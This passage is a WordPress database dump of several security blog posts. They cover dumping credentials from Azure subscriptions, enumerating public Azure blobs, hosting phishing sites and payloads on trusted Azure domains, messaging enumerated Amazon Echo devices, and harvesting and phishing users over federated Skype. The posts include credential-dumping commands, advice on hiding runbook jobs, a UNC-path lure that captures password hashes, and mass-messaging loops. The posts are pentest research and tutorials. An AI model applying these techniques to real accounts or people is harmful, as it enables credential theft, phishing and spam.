[post_title] => Anonymously Enumerating Azure Services [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => enumerating-azure-services [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:55:39 [post_modified_gmt] => 2021-06-08 21:55:39 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=9724 [menu_order] => 572 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [40] => WP_Post Object ( [ID] => 9595 [post_author] => 10 [post_date] => 2018-08-28 07:00:18 [post_date_gmt] => 2018-08-28 07:00:18 [post_content] => During different types of assessments (web app, network, cloud), we will run into situations where we obtain domain credentials that can be used to log into Azure subscriptions. Most commonly, we will externally guess credentials for a privileged domain user, but we’ve also seen excessive permissions in web applications that use Azure AD for authentication. If we’re really lucky, we’ll have access to a user that has rights (typically Owner or Contributor) to access sensitive information in the subscription. If we have privileged access, there are three specific areas that we typically focus on for gathering credentials:
  • Key Vaults
  • App Services Configurations
  • Automation Accounts
There are other places that application/domain credentials could be hiding (See Storage Account files), but these are the first couple of spots that we want to check for credentials. In this post, we’ll go over the key areas where credentials are commonly found and the usage of a PowerShell script (a part of MicroBurst) that I put together to automate the process of gathering credentials from an Azure environment.

Key Vaults

Azure Key Vaults are Microsoft’s solution for storing sensitive data (Keys, Passwords/Secrets, Certs) in the Azure cloud. Inherently, Key Vaults are great sources for finding credential data. If you have a user with the correct rights, you should be able to read data out of the key stores. Here’s a quick overview of setting permissions for Key Vaults - https://docs.microsoft.com/en-us/azure/key-vault/key-vault-secure-your-key-vault An example Key Vault Secret: Keyvault For dumping Key Vault values, we’re using some standard Azure PowerShell commands:
  • Get-AzureKeyVaultKey
  • Get-AzureKeyVaultSecret
If you’re just looking at exporting one or two secrets, these commands can be run individually. But since we’re typically trying to access everything that we can in an Azure subscription, we’ve automated the process in the script. The script will export all of the secrets in cleartext, along with any certificates. You also have the option to save the certificates locally with the -ExportCerts flag. With access to the keys, secrets, and certificates, you may be able to use them to pivot through systems in the Azure subscription. Additionally, I’ve seen situations where administrators have stored Azure AD user credentials in the Key Vault.

App Services Configurations

Azure App Services are Microsoft’s option for rapid application deployment. Applications can be spun up quickly using app services and the configurations (passwords) are pushed to the applications via the App Services profiles. In the portal, the App Services deployment passwords are typically found in the “Publish Profile” link that can be found in the top navigation bar within the App Services section. Any user with contributor rights to the application should be able to access this profile. Appservices For dumping App Services configurations, we’re using the following AzureRM PowerShell commands:
  • Get-AzureRmWebApp
  • Get-AzureRmResource
  • Get-AzureRmWebAppPublishingProfile
Again, if this is just a one-off configuration dump, it’s easy to grab the profile from the web portal. But since we’re looking to automate this process, we use the commands above to list out the available apps and profiles for each app. Once the publishing profile is collected by the script, it is then parsed and credentials are returned in the final output table. Potential next steps include uploading a web shell to the App Services web server, or using any parsed connection strings included in the deployment to access the databases. With access to the databases, you could potentially use them as a C2 channel. Check out Scott’s post for more information on that.

Automation Accounts

Automation accounts are one of the ways that you can automate tasks on Azure subscriptions. As part of the automation process, Azure allows these accounts to run code in the Azure environment. This code can be PowerShell or Python, and it can also be very handy for pentesting activities. Autoaccounts The automation account credential gathering process is particularly interesting, as we will have to run some PowerShell in Azure to actually get the credentials for the automation accounts. This section of the script will deploy a Runbook as a ps1 file to the Azure environment in order to get access to the credentials. Basically, the automation script is generated in the tool and includes the automation account name that we’re gathering the credentials for.
$myCredential = Get-AutomationPSCredential -Name 'ACCOUNT_NAME_HERE'</code><code>$userName = $myCredential.UserName</code><code>$password = $myCredential.GetNetworkCredential().Password</code><code>write-output "$userName"</code><code>write-output "$password"
This Microsoft page was a big help in getting this section of the script figured out. Dumping these credentials can take a minute, as the automation script needs to be spooled up and ran on the Azure side. This method of grabbing Automation Account credentials is not the most OpSec safe, but the script does attempt to clean up after itself by deleting the Runbook. As long as the Runbook is successfully deleted at the end of the run, all that will be left is an entry in the Jobs page. Jobentry To help with obscuring these activities, the script generates 15-character job names for each Runbook so it’s hard to tell what was actually run. If you want, you can modify the jobName variable in the code to name it something a little more in line with the tutorial names, but the random names help prevent issues with naming conflicts. Jobtutorials Since the Automation Account credentials are user generated, there’s a chance that the passwords are being reused somewhere else in the environment, but your mileage may vary.

Script Usage

In order for this script to work, you will need to have the AzureRM and Azure PowerShell modules installed. Both modules have different ways to access the same things, but together, they can access everything that we need for this script.
  • Install-Module -Name AzureRM
  • Install-Module -Name Azure
The script will prompt you to install if they’re not already installed, but it doesn’t hurt to get those installed before we start. *Update (3/19/20) - I've updated the scripts to be Az module compliant, so if you're already using the Az modules, you can use the Get-AzPasswords (versus Get-AzurePasswords) instead. The usage of this tool is pretty simple.
  1. Download the code from GitHub - https://github.com/NetSPI/MicroBurst
  2. Load up the module
    1. Import-Module .Get-AzurePasswords.ps1
    2. or load the script file into the PowerShell ISE and hit F5
  3. Get-AzurePasswords -Verbose
    1. Either pipe to Out-Gridview or to Export-CSV for easier parsing
    2. If you’re not already authenticated to the Azure console, it will prompt you to login.
    3. The script will also prompt you for the subscription you would like to use
  4. Review your creds, access other systems, take over the environment
If you’re having issues with the PowerShell execution policy, I have it on good authority that there’s at least 15 different ways that you can bypass the policy. Sample Output:
  • Get-AzurePasswords -Verbose | Out-GridView
Adpoutput Adpgrid *The PowerShell output above and the Out-Gridview output has been redacted to protect the privacy of my test Azure subscription. Alternatively, you can pipe the output to Export-CSV to save the credentials in a CSV. If you don’t redirect the output, the credentials will just be returned as data table entries.

Conclusion

There’s a fair number of places where credentials can hide in an Azure subscription, and there’s plenty of uses for these credentials while attacking an Azure environment. Hopefully this script helps automate your process for gathering those credentials. For those that have read "Pentesting Azure Applications", you may have noticed that they call out the same credential locations in the “Other Azure Services” chapter. I actually had most of this script written prior to the book coming out, but the book really helped me figure out the Automation account credential section. If you haven’t read the book yet, and want a nice deep dive on Azure security, you can get it from no starch press - https://nostarch.com/azure [post_title] => Get-AzurePasswords: A Tool for Dumping Credentials from Azure Subscriptions [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => get-azurepasswords [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:55:19 [post_modified_gmt] => 2021-06-08 21:55:19 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=9595 [menu_order] => 581 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [41] => WP_Post Object ( [ID] => 9319 [post_author] => 10 [post_date] => 2018-07-17 07:00:28 [post_date_gmt] => 2018-07-17 07:00:28 [post_content] => In recent years, we have seen Microsoft Azure services gathering a larger market share in the cloud space. While they're not seeing quite the adoption that AWS has, we are running into more clients that are using Microsoft Azure services for their operations. If everything is configured correctly, this can be totally fine, but it's pretty rare for an environment to be perfectly secured (and that's why we do security testing). Given the increase in Azure usage, we wanted to dive deeper into automating our standard Azure testing tasks, including the enumeration of publicly available files. In this blog, we'll go over the different types of Azure file stores and how we can potentially enumerate and access publicly available "Blob" files.

Storage Accounts

One of the issues that we've seen within Azure environments is publicly exposing files through storage accounts. These issues are pretty similar to the issues that have come up around public S3 buckets (A good primer here). "Storage Accounts" are Microsoft's way of handling data storage in Azure. Each storage account has a unique subdomain assigned to it in the core.windows.net domain. For example, if I create the netspiazure storage account, I would have netspiazure.core.windows.net assigned to the account.

Storageacct

This subdomain structure also extends out to the different file types within the storage accounts
  • Blobs - netspiazure.blob.core.windows.net
  • File Services - netspiazure.file.core.windows.net
  • Data Tables - netspiazure.table.core.windows.net
  • Queues - netspiazure.queue.core.windows.net

Blobs

For the purpose of this blog, we're just going to focus on the "Blobs", but the other data types are also interesting. Blobs are Microsoft's unstructured data storage objects. Most frequently, we're seeing them used for serving static public data, but we have found blobs being used to store sensitive information (config files, database backups, credentials). Given that Google is indexing about 1.2 million PDFs from the Azure "blob.core.windows.net" subdomain, I think there's pretty decent surface area here. Googlepdfs

Permissions

The blobs themselves are stored within "Containers", which are basically folders. Containers have access policies assigned to them, which determines the level of public access that is available for the files. Permissions If a container has a "Container" public access policy, then anonymous users can list and read any of the files that are in the container. The "Blob" public access policy still allows anonymous users to read files, but they can't list the container files. "Blob" permissions also prevent the basic confirmation of container names via the Azure Blob Service Rest APIs.

Automation

Given the number of Azure environments that we've been running into, I wanted to automate our process for enumerating publicly available blob files. I'm partial to PowerShell, but this script could potentially be ported to other languages. Code for the script can be found on NetSPI's GitHub - https://github.com/NetSPI/MicroBurst At the core of the script, we're doing DNS lookups for blob.core.windows.net subdomains to enumerate valid storage accounts and then brute-force container names using the Azure Blob Service REST APIs. Additionally, the Bing Search API can be used within the tool to find additional storage accounts and containers that are already publicly indexed. Once a valid container name is identified, we use the Azure Blob APIs again to see if the container allows us to list files via the "Container" public access policy. To come up with valid storage account names, we start with a base name (netspi) and either prepend or postpend additional words (dev, test, qa, etc.) that come from a permutations wordlist file. The general idea for this script along with parts of the permutations list comes from a similar tool for AWS S3 buckets - inSp3ctor

Invoke-EnumerateAzureBlobs Usage

The script has five parameters:
  • Base - The base name that you want to run permutations on (netspi)
  • Permutations - The file containing words to use with the base to find the storage accounts (netspidev, testnetspi, etc.)
  • Folders - The file containing potential folder names that you want to brute force (files, docs, etc.)
  • BingAPIKey - The Bing API Key to use for finding additional public files
  • OutputFile - The file to write the output to
Example Output:
PS C:> Invoke-EnumerateAzureBlobs -Base secure -BingAPIKey 12345678901234567899876543210123
Found Storage Account -  secure.blob.core.windows.net
Found Storage Account -  testsecure.blob.core.windows.net
Found Storage Account -  securetest.blob.core.windows.net
Found Storage Account -  securedata.blob.core.windows.net
Found Storage Account -  securefiles.blob.core.windows.net
Found Storage Account -  securefilestorage.blob.core.windows.net
Found Storage Account -  securestorageaccount.blob.core.windows.net
Found Storage Account -  securesql.blob.core.windows.net
Found Storage Account -  hrsecure.blob.core.windows.net
Found Storage Account -  secureit.blob.core.windows.net
Found Storage Account -  secureimages.blob.core.windows.net
Found Storage Account -  securestorage.blob.core.windows.net
Bing Found Storage Account - notrealstorage.blob.core.windows.net
Found Container - hrsecure.blob.core.windows.net/NETSPItest
    Public File Available: https://hrsecure.blob.core.windows.net/NETSPItest/SuperSecretFile.txt
    Public File Available: https://hrsecure.blob.core.windows.net/NETSPItest/TaxReturn.pdf
Found Container - secureimages.blob.core.windows.net/NETSPItest123
    Empty Public Container Available: https://secureimages.blob.core.windows.net/NETSPItest123?restype=container&comp=list
By default, both the "Permutations" and "Folders" parameters are set to the permutations.txt file that comes with the script. You can increase your chances for finding files by adding any client/environment specific terms to that file. Adding in a Bing API Key will also help find additional storage accounts that contain your base word. If you don't already have a Bing API Key set up, navigate to the "Cognitive Services" section of the Azure Portal and create a new "Bing Search v7" instance for your account. There's a free pricing tier that will get you up to 3,000 calls per month, which will hopefully be sufficient. If you are using the Bing API Key, you will be prompted with an out-gridview selection window to select any storage accounts that you want to look at. There are a few publicly indexed Azure storage accounts that seem to hit on most company names. These accounts seem to be indexing documents for or data on multiple companies, so they have a tendency to frequently show up in your Bing results. Several of these accounts also have public file listing, so that may give you a large list of public files that you don't care about. Either way, I've had pretty good luck with the script so far, and hopefully you do too. If you have any issues with the script, feel free to leave a comment or pull request on the GitHub page. [post_title] => Anonymously Enumerating Azure File Resources [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => anonymously-enumerating-azure-file-resources [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:54:42 [post_modified_gmt] => 2021-06-08 21:54:42 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=9319 [menu_order] => 586 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [42] => WP_Post Object ( [ID] => 8846 [post_author] => 10 [post_date] => 2018-05-22 07:00:11 [post_date_gmt] => 2018-05-22 07:00:11 [post_content] =>

Everything seems to be moving into the cloud, so why not move your red team infrastructure there too. Well… lots of people have already been doing that (see here), but what about using hosted services from a cloud provider to hide your activities within the safety of the provider’s trusted domains? That’s something that we haven’t seen as much of, so we decided to start investigating cloud services that would allow us to make use of subdomains from trusted domains.

There are multiple options for cloud providers, so for starters we will be just looking at Microsoft's Azure services. Each cloud provider offers similar services, so you may be able to apply these techniques to other providers.

Domain Reputation Overview

Given that Domain Fronting is kind of on its way out, we wanted to find alternative ways to use trusted domains to bypass filters. One of the benefits of using Azure cloud services for red team engagements is the inherent domain reputation that comes with the domains that are hosting your data (Phishing sites, Payloads, etc.).

To be specific here, these are services hosted by Microsoft that are typically hosted under a Microsoft sub-domain (windows.net, etc.). By making use of a domain that’s already listed as “Good”, we can hopefully bypass any web proxy filters as we work through an engagement.

This is not a comprehensive list of the Azure services and corresponding domains, but we looked at the Talos reputation scores for some of the primary services. These scores can give us an idea of whether or not a web proxy filter would consider our destination domain as trusted. Each Azure domain that we tested came in as Neutral or Good, so that works in our favor.

ServiceBase DomainBase Web ReputationBase Weighted ReputationSubdomain Web ReputationSubdomain Weighted Reputation
App Servicesazurewebsites.netNeutralNo ScoreNeutralNo Score
Blob Storageblob.core.windows.netGoodGoodGoodGood
File Servicefile.core.windows.netGoodGoodGoodGood
AzureSQLdatabase.windows.netGoodGoodGoodGood
Cosmos DBdocuments.azure.comNeutralNeutralNeutralNeutral
IoT Hubazure-devices.netNeutralNo ScoreNeutralNo Score

Note: We also looked at the specific subdomains that were attached to these Azure domains and included their reputations in the last two columns. All subdomains were created fresh and did not get seasoned prior to reputation checking. If you’re looking for ways to get your domain trusted by web proxies, take a look at Ryan Gandrud’s post – Adding Web Content Filter Exceptions for Phishing Success.

For the purposes of this blog, we're just going to focus on the App Services, Blob Storage, and AzureSQL services, but there's plenty of opportunities in the other services for additional research.

Hosting Your Phishing Site

The Azure App Services domains scored Neutral or No Score on the reputation scores, but there’s one great benefit from hosting your phishing site with Azure App Services - the SSL certificate. When you use the default options for spinning up an App Services “Web App”, you will be issued an SSL certificate for the site that is verified by Microsoft.

Cert

Now I would never encourage someone to pretend to be Microsoft, but I hear that it works pretty well for phishing exercises. One downside here is that the TLD (azurewebsites.net) isn’t the most known domain on the internet and it might raise some flags from people looking at the URL.

*This is also probably against the Azure terms and conditions, so insert your standard disclaimer here.

**Update: After posting this blog, my test site changed the ownership information on the SSL certificate (after ~5 days of uptime), so your mileage may vary.

As a security professional, I would probably take issue with that domain, but with a Microsoft verified certificate, I might have less apprehension. When the service was introduced, ZDNet actually called it “phishing-friendly”, but as far as we could find, it hasn’t really been adopted for red team operations.

The setup of an Azure App Services “Web App” is really straightforward and takes about 10 minutes total (assuming your phishing page code is all ready to go).

Check out the Microsoft documentation on how to set up your first App Services Web App here - https://docs.microsoft.com/en-us/azure/app-service/app-service-web-overview

Or just try it out on the Azure Portal – https://portal.azure.com

Storing Your Payloads

Setting up your payload delivery is also easy within Azure. Similar to the AWS S3 service, Microsoft has their own public HTTP file storage solution called Blob Storage. Blobs can be set up under a “Storage Account” using a unique name. The unique naming is due to the fact that each Blob is created as a subdomain of the “blob.core.windows.net” domain.

Blob

For example, any payloads stored in the “notpayloads” blob would be available at https://notpayloads.blob.core.windows.net/. We also found that these domains already had a “Good” reputation, so it makes them a great option for delivering payloads. If you can grab a quality Blob name (updates, photos, etc.), this will also help with the legitimacy of your payload URL.

I haven’t done extensive testing on long term storage of payloads in blobs, but a 2014 version of Mimikatz was not flagged by anything on upload, so I don’t think that should be an issue.

Setting up Blob storage is also really simple. Just make sure that you set your Blob container “Access policy” to “Blob” or “Container” to allow public access to your payloads.

If you need a primer, check out Microsoft’s documentation here - https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction

Setting Up Your C2 in Azure

There are several potential options for hosting your C2 infrastructure in Azure, but as a companion to this blog, Scott Sutherland has written up a method for using AzureSQL as a C2 option. He will be publishing that information on the NetSPI blog later this week.

Conclusions / Credits

You may not want to move the entirety of your red team operations to the Azure cloud, but it may be worth using some of the Azure services, considering the benefits that you get from Microsoft’s trusted domains. For the defenders that are reading, you may want to keep a closer eye on the traffic that's going through the domains that we listed above. Security awareness training may also be useful in helping prevent your users from trusting an Azure phishing site.

Special thanks to Alexander Leary for the idea of storing payloads in Blob Storage, and Scott Sutherland for the brainstorming and QA help.

[post_title] => Utilizing Azure Services for Red Team Engagements [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => utiilzing-azure-for-red-team-engagements [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:53:42 [post_modified_gmt] => 2021-06-08 21:53:42 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=8846 [menu_order] => 593 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [43] => WP_Post Object ( [ID] => 7688 [post_author] => 10 [post_date] => 2017-11-20 07:00:45 [post_date_gmt] => 2017-11-20 07:00:45 [post_content] => Amazon recently introduced messaging and calling between Echo devices. This allows Echo device owners to communicate to each other via text messages, audio recordings, and voice calls. It’s pretty handy for leaving someone a short note, or for a quick call, but as a hacker, I was more curious about the potential security issues associated with these new features. There have already been a couple of articles recently published that deal with some of the privacy concerns about the features, so we will be going deeper into the technical side of things for this post.

Enumerating Echoes

The “Amazon Alexa” mobile application can take in your phone's contact list and look up potential call contacts via their phone number. I was finding a surprising number of Echos in my contact list, so I figured the next step would be to try enumerating Echos that were not (yet) in my contact list. In order to do this, I needed to import new contacts into my phone with the phone numbers that I wanted to check for Echo devices. Creating the contacts was pretty simple using some Excel magic and the CSV contact import function in Gmail. So I fired up my throwaway Gmail account and added the entire 612-555-XXXX range (10,000 numbers) into my contacts list. For the privacy of the numbers listed below, I’ve changed the second set of numbers in the range to 555. To keep track of each number that I imported, I added the last name as “Test 1234”, where 1234 was the last four digits of the number that I was trying. Taking this route, I was able to identify 65 Echo devices in my phone number’s exchange range.

Contacts

Given that I was only able to find 65 Echo devices (of the more than 11 million sold), I guess that my number’s range isn’t very active. Google’s upper limit of contacts is 25,000 (Source), so I could potentially cover 2.5 ranges at once with one Gmail account. Given that there are 1,117 exchange ranges in the Minneapolis 612 area code (Source), it would take 447 rounds of this method to cover all of the 612 ranges. Alternatively, you could potentially add additional Google accounts to your phone and cut down the number of contact upload rounds. Please keep in mind that Amazon is monitoring for massive contact uploads, so don't try this at home. Side Note: For all of the following examples, I proxied the Alexa iOS application traffic through Burp Suite Professional, using an SSL certificate that was trusted by my device. Once an Echo device is added to your Amazon contact list, you will be able to see that the contact will have a specific Amazon ID tied to their account. These 28-character, alpha-numeric IDs are used with the APIs for interacting with other Echo devices. Here is one of the records that would be returned from my contacts list.
HTTP/1.1 200 OK
Server: Server
Date: Wed, 31 May 2017 23:12:58 GMT
Content-Type: application/json
Connection: close
Vary: Accept-Encoding,User-Agent
Content-Length: 63644

[{"name":{"firstName":"Karl","lastName":"Fosaaen"},"numbers":[{"number":"+1612[REDACTED]","type":"Mobile"}],"number":"+1612[REDACTED]","id":"bf[REDACTED]88","deviceContactId":null,"serverContactId":"bf[REDACTED]88","alexaEnabled":true,"isHomeGroup":false,"isBulkImport":false,"isBlocked":null,"sourceDeviceId":null,"sourceDeviceName":null,"commsId":["amzn1.comms.id.person.amzn1~amzn1.account.MY_AMAZON_ID"],"commsIds":[{"aor":"sips:id.person.amzn1~amzn1.account.MY_AMAZON_ID@amcs-tachyon.com","id":"amzn1.comms.id.person.amzn1~amzn1.account.MY_AMAZON_ID"}],"homeGroupId":null,"commsIdsPreferences":{"amzn1.comms.id.person.amzn1~amzn1.account. MY_AMAZON_ID":{"preferenceGrantedToContactByUser":{},"preferenceGrantedToUserByContact":{}}}},[Truncated]

Sending Text Messages

By proxying the iOS application traffic, we can also see the protocol used for creating text and audio messages. The protocol is pretty simple. Here’s the POST request that we would use to generate a new text message to the “THE_RECIPIENT_ID” user that we would have previously enumerated.
POST /users/amzn1.comms.id.person.amzn1~amzn1.account.YOUR_AMAZON_SOURCEID/conversations/amzn1.comms.id.person.amzn1~amzn1.account.THE_RECIPIENT_ID/messages HTTP/1.1
Host: alexa-comms-mobile-service-na.amazon.com
X-Amzn-ClientId: [Truncated]
Content-Type: application/json
X-Amzn-RequestId: [Truncated]
Accept: */*
Connection: close
Cookie: [Truncated]
User-Agent: Amazon Alexa/2.0.2478/1.0.2992.0/iPhone8,1/iOS_10.3.2
Content-Length: 170
Accept-Language: en-us

[{"payload":{"text":"Hey. This is Karl. I'm testing some Amazon stuff. I promise I won't spam you over this. "},"time":"2017-05-31T23:17:20.863Z","type":"message/text"}]

Sending Audio Messages

The audio side of things is a little different. First you have to upload your audio file (which you can overwrite with a proxy), then you send someone a link to the audio file. Here’s what the upload request and response would look like. HTTP POST Request:
POST /v1/media?include-transcript=true HTTP/1.1
Host: project-wink-mss-na.amazon.com
Accept: */*
Authorization: [Truncated]
Accept-Language: en-us
Content-Type: audio/aac
X-Authorization-Act-As: amzn1.comms.id.person.amzn1~amzn1.account.YOUR_AMAZON_SOURCEID
Content-Length: 39881
User-Agent: Amazon Alexa/2.0.2478/1.0.2992.0/iPhone8,1/iOS_10.3.2
Connection: close
X-Amzn-RequestId: 82DFDC97-65AE-4379-AE2D-77261AD13191
X-Total-Transfer-Length: 99150

[Truncated m4a audio file to be uploaded]
HTTP Server Response:
HTTP/1.1 201 Created
Server: Server
Date: Wed, 31 May 2017 23:26:01 GMT
Content-Type: application/json
Connection: close
Location: https://project-wink-mss-na.amazon.com/v1/media/arn:alexa:messaging:na::mediastorageservice:amzn1.tortuga.2.07ec8e8a-652a-46a7-8fe2-968980e1d8d0.RD02REDACTEDCOT
Vary: Accept-Encoding,User-Agent
Content-Length: 170

{"id":"arn:alexa:messaging:na::mediastorageservice:amzn1.tortuga.2.07ec8e8a-652a-46a7-8fe2-968980e1d8d0. RD02REDACTEDCOT","transcript":null,"transcriptStatus":null}
The "id" above can then be used for an audio message, in a request that looks like this.
POST /users/amzn1.comms.id.person.amzn1~amzn1.account.YOUR_AMAZON_SOURCEID/conversations/amzn1.comms.id.person.amzn1~amzn1.account.THE_RECIPIENT_ID/messages HTTP/1.1
Host: alexa-comms-mobile-service-na.amazon.com
X-Amzn-ClientId: DEF9FF9C-86EC-4C2E-BFFB-8C6D2A601D31
Content-Type: application/json
X-Amzn-RequestId: 9F4439B8-66FB-496B-820F-E7A96089F588
Accept: */*
Connection: close
Cookie: [Truncated]
User-Agent: Amazon Alexa/2.0.2478/1.0.2992.0/iPhone8,1/iOS_10.3.2
Content-Length: 205
Accept-Language: en-us

[{"payload":{"mediaId":"arn:alexa:messaging:na::mediastorageservice:amzn1.tortuga.2.07ec8e8a-652a-46a7-8fe2-968980e1d8d0.RD02REDACTEDCOT"},"time":"2017-05-31T22:50:06.005Z","type":"message/audio"}]
At this point, the audio message will be delivered to the recipient in the mobile app, or the Echo will let the recipient know there’s a new message.

Next Steps

So at this point, we’ve enumerated a city’s worth of Echo devices, figured out how to send text and audio messages to all of them, and we have a moral obligation to do the right thing. In the spirit of the last item, I've been in contact with the Amazon security team about this and they've been really great to work with on the disclosure process. They have already implemented some controls to prevent abuse with these features, and I'm looking forward to diving into the next set of features that they add to the Echo devices. [post_title] => Speaking to a City of Amazon Echoes [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => speaking-to-a-city-of-amazon-echoes [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:52:01 [post_modified_gmt] => 2021-06-08 21:52:01 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=7688 [menu_order] => 611 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [44] => WP_Post Object ( [ID] => 6445 [post_author] => 10 [post_date] => 2016-07-21 07:00:21 [post_date_gmt] => 2016-07-21 07:00:21 [post_content] => Federated Skype for Business is a handy way to allow businesses to communicate with each other over a common instant messaging platform. From a security standpoint, the open exchange of information between businesses is a little concerning. NetSPI first started running into instances of federated Skype for Business (at that time Lync) about two years ago. We had opened up federation on our Skype setup and found that we could IM with some of our clients. We also found out that we could see their current availability. This was a little concerning to me at the time, but I was busy, so I didn’t look into it. I was finally able to really start digging into Skype federation last fall and it’s been a really interesting research subject.

The Basics

Skype federation works by setting up an internet facing federated endpoint to allow for outside domains to connect to and send messages through to another domain. Basically, Business A can talk to Business B, if both of them have the proper federation set up. There are a couple of ways that you can set up federation, but most of the domains that we’ve run into so far just have open federation enabled. You can restrict it by domain, but I have not seen this implemented as frequently. Being able to Skype chat with clients and other businesses could be handy, but what can we do with this as pen testers? For starters:
  • Validate email addresses
  • Get Skype availability and Out-of-Office statuses
  • Send phishing messages via Skype

Setting up Your Test Environment

Since you may not have federated Skype for Business (or Lync) at your disposal, and you probably don’t want to set up a server for yourself (I’ve heard it’s rough), you can just go to the cloud. This may sound like a plug for Microsoft services, but they are a reasonably priced option for testing this stuff out. You can go month to month ($6/month) or a full year ($5/month) and get federated Skype for Business services direct from Microsoft (See Here). It’s really easy to set up and if you only need it for an engagement, it’s pretty easy to fire up for a month. You will have to specifically enable domain federation through the web interface, but it’s pretty easy. Go to the Skype for Business admin center, select organization, and change the external access to “On except for blocked domains”. Also check the “public IM connectivity” button too. Once you have a federated Skype for Business domain set up, you just need the Skype for Business client (available on the Microsoft Office Portal) installed on your machine to start poking around. Let’s take a look at a sample domain. Here’s what we see when we try to communicate with an email address that is not federated with Skype.

We can see that the email address is listed in full and we get "Presence unknown" for the current status. Here’s what a live federated email address will look like. (Note the Full Name, Job Title, and Status)

Here’s what it looks like when I open up conversations with a bunch of CEOs from other federated companies. So we have a full name, job title, and current status. This is handy for one-off targeting of individuals, but what if we want to target a larger list. We can use the Lync SDK and some PowerShell to do that.

The Lync (Skype for Business) SDK

This can be kind of a pain to properly set up, so follow these steps. I know Visual Studio 2010 is old, but it’s the easiest way to get the Lync SDK to work. This should work. I’ve gone through this on a Windows 10 VM and had no issues. If you have issues with it, feel free to leave a comment. Once you have the SDK installed, we can start wrapping the SDK functions with PowerShell to automate our attacks. I’ve put together a few functions (outlined below) that we can use to start attacking these federated Skype for Business interfaces. Get the module here: https://github.com/NetSPI/PowerShell/blob/master/PowerSkype.ps1 All of these functions should be working, and there's a few more on the way (along with better documentation). Feel free to comment on the GitHub page with any feedback. If you have issues importing the Lync SDK DLL, do a search on your system for "Microsoft.Lync.Model.dll" and change your path in the module. If you followed the steps above, it should be in the default path.

Overview of Module Functions

Validate an email and get its status - Single Email
Get-SkypeStatus -email test@example.com

Email         : test@example.com
Title         : Chief Example Officer
Full Name     : Testing McTestface
Status        : Available
Out Of Office : False

*Side note - Since there is sometimes a federation delay, you may not get a user's status back immediately. It helps if you run the function a couple (2-3) of times. This can be done by using the "attempts" flag. You may end up with duplicates if you do multiple attempts, but you'll probably have better coverage.

Validate emails and get statuses - List Input
Get-SkypeStatus -inputFile C:Tempemails.txt | ft -auto

Email                       Title          Full Name   Status        Out Of Office
-----                       -----          ---------   ------        -------------
FakeName1@example.com      Consultant      FakeName 1  Away          False       
FakeName2@example.com      Accountant      FakeName 2  Away          False       
FakeName3@example.com      Intern          FakeName 3  Away          False       
FakeName4@example.com      Lead Intern     FakeName 4  Out of Office True        
FakeName5@example.com      Associate       FakeName 5  Available     False       
FakeName6@example.com      Somebody        FakeName 6  Offline       False       
FakeName7@example.com      Senior Somebody FakeName 7  Offline       False      
FakeName8@example.com      Marketing Guru  FakeName 8  Away          False       
FakeName9@example.com      IT “Engineer”   FakeName 9  Offline
Send a message - Single User
Invoke-SendSkypeMessage -email test@example.com -message "Hello World"
Sent the following message to test@example.com:
Hello World
Send a message - Multiple Users
get-content emails.txt | foreach {Invoke-SendSkypeMessage -email $_ -message "Hello World"}
Sent the following message to test@example.com:
Hello World

Sent the following message to test2@example.com:
Hello World
*If you don't feel like piping get-content, you can just use the "inputFile" parameter here as well. Start a group message
Invoke-SendGroupSkypeMessage -emails "test@example.com, test1@example.com" -message "testing"
Sent the following message to 2 users:
testing

*You can also use an input file here as well.

Send a million messages**
for ($i = 0; $i -lt 1000000; $i++){Invoke-SendSkypeMessage -email test@example.com -message "Hello $i"}
Sent the following message to test@example.com:
Hello 0
Sent the following message to test@example.com:
Hello 1
Sent the following message to test@example.com:
Hello 2
Sent the following message to test@example.com:
Hello 3
...
**For the record, Skype will probably not be happy with you if you try to open a million conversations. My Skype client starts crashing when it takes up around 1.5 gb of memory.

Current Exposure

So how big of an exposure is this? Since I see federation pretty regularly with our clients, I decided to go out and check the internet for other domains that support Skype federation. There are a couple of ways that we can identify potential federated Skype for Business domains. We’ll start with the Alexa top 1 million list and work down from there. We’ll start by seeing which domains have the ms=ms12345678 records. This is commonly placed in DNS TXT records so that Microsoft can validate the domain that is being federated.

47,455 of the top 1 million have “ms=ms*” records

Next we’ll take a look at how many of those "MS" domains have SIP or Microsoft federation specific SRV records enabled.

_sip._tcp.example.com -  9,395 Records

_sip._tls.example.com - 28,719 Records

_sipfederationtls._tcp.example.com - 28,537 Records

Taking a unique list of the domains from each of those lists, we end up with 29,551 domains. Now we can try to send messages to the “Administrator” (Default Domain Admin) Skype address.

45 Domains with the “Administrator” account registered on Skype for Business

I'm sure that there are plenty of domains in the list with renamed Administrator accounts and many others that also do not have a Skype user set up for that account, but this is still an interesting number of domain admins that are somewhat exposed.

Further Attacks

As you can see, there’s some decent surface area here to start attacking. My current favorite thing to send is UNC paths. Sending someone www.microsoftsupport.onlinehelp looks somewhat legitimate and happens to send a Skype user’s hash (if they click on it) directly to your attacking system (assuming you own microsoftsupport.online). Once you crack that hash, there's a good chance that the organization has auto-discovery set up for global Skype access. Just login to Skype for Business with your cracked credentials and start saying hello to your new co-workers. Some other options:
  • Want some extra time to run your attack, wait until the entire SOC team is “Away” or “In a Meeting” and fire away.
